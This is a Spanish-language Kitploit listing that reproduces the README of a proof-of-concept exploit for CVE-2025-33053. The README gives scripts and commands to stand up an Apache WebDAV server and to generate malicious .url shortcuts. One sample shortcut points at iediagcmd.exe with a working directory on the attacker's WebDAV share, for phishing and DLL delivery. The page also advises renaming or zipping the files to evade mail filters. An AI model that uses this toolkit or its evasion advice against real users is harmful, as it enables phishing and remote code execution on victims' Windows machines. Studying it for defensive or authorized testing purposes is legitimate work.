Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-33053-Proof-Of-Concept — CVE-2025-33053 Prueba de concepto (PoC) | Kitploit
Herramientas/GitHubGitHub/devbuihieu/cve-2025-33053-proof-of-concept
Generación de PayloadsExplotaciónMovimiento LateralPhishingSeguridad WebPruebas de PenetraciónComando y ControlIngeniería SocialRed Teaming
GitHubdevbuihieu/cve-2025-33053-proof-of-concept

CVE-2025-33053-Proof-Of-Concept

CVE-2025-33053 Prueba de concepto (PoC)

Ver Repositorio
64164hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-33053 Prueba de Concepto

Este repositorio proporciona scripts para desplegar automáticamente un servidor WebDAV en Ubuntu usando Apache2 y generar archivos .url maliciosos para su uso en phishing, red teaming o simulación de movimiento lateral.


📁 Contenido

  • setup_webdav.sh – Script Bash para configurar Apache2 + WebDAV.
  • setup_webdav.py – Versión en Python del anterior.
  • gen_url.py – Script en Python para generar archivos de acceso directo .url con rutas UNC/WebDAV.
  • README.md – Documentación.

🔧 Requisitos

  • SO: Ubuntu 20.04 o posterior (compatible con Debian)
  • Privilegios de root ()
sudo
  • Python 3.x

  • 🚀 Instrucciones de Configuración

    1. Servidor WebDAV (mediante Bash)

    root@kitploit:~
    sudo bash setup_webdav.sh
    

    O usando Python:

    root@kitploit:~
    sudo python3 setup_webdav.py
    

    Por defecto, el script:

    • Instala Apache y los módulos WebDAV necesarios.
    • Crea un directorio compartido en /var/www/webdav.
    • Habilita los módulos DAV y DAV_FS.
    • Crea un directorio DavLockDB (para evitar errores de bloqueo DAV de Apache).
    • Reinicia el servicio Apache.

    📎 Ruta WebDAV: http://<your-ip>/webdav/


    💣 Generando un Acceso Directo .url Malicioso

    Ejemplo de uso:

    root@kitploit:~
    python3 gen_url.py --ip 192.168.1.100 --out doc.url
    

    Todas las opciones:

    root@kitploit:~
    python3 gen_url.py \
      --ip 《YOUR IP ADDRESS》\
      --share 《YOUR SHARE NAME》(Default: webdav) \
      --out 《YOUR OUTPUT FILENAME.url》(Default: bait.url) \
      --exe "C:\Program Files\Internet Explorer\iediagcmd.exe" \
      --icon "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" \
      --index 13 \
      --modified 20F06BA06D07BD014D
    

    Esto creará un archivo .url como:

    root@kitploit:~
    [InternetShortcut]
    URL=C:\Program Files\Internet Explorer\iediagcmd.exe
    WorkingDirectory=\\192.168.1.100\webdav\
    ShowCommand=7
    IconIndex=13
    IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Modified=20F06BA06D07BD014D
    

    📌 Al hacer clic en este archivo (en ciertas configuraciones), el sistema objetivo podría conectarse automáticamente a tu servidor WebDAV (autenticación o entrega de DLL).


    🔒 Notas para Pruebas de Seguridad

    • Desactiva el firewall (o abre el puerto 80) si estás probando en una red local:
      root@kitploit:~
      sudo ufw allow 80
      
    • Los archivos .url pueden no ejecutarse como se espera dependiendo de:
      • Restricciones de directivas de grupo
      • Aplicaciones predeterminadas
      • Cliente de correo (Gmail puede sanearlos)
    • Puede que necesites comprimir o renombrar .url a .txt para evadir filtros.

    ⚠️ Aviso Legal

    Este repositorio es solo para fines educativos y pruebas de penetración autorizadas.
    No uses estos scripts contra sistemas que no te pertenezcan o para los que no tengas permiso de prueba.


    🧠 Referencias

    • Configuración del servidor WebDAV - LinuxConfig.org
    • Configuración de WebDAV en Apache - Peter Girnus
    • Documentación de Microsoft WebDAV

    📬 Contacto

    Para preguntas o solicitudes éticas de red teaming, contacta a través de los issues de GitHub.

    Descargar herramienta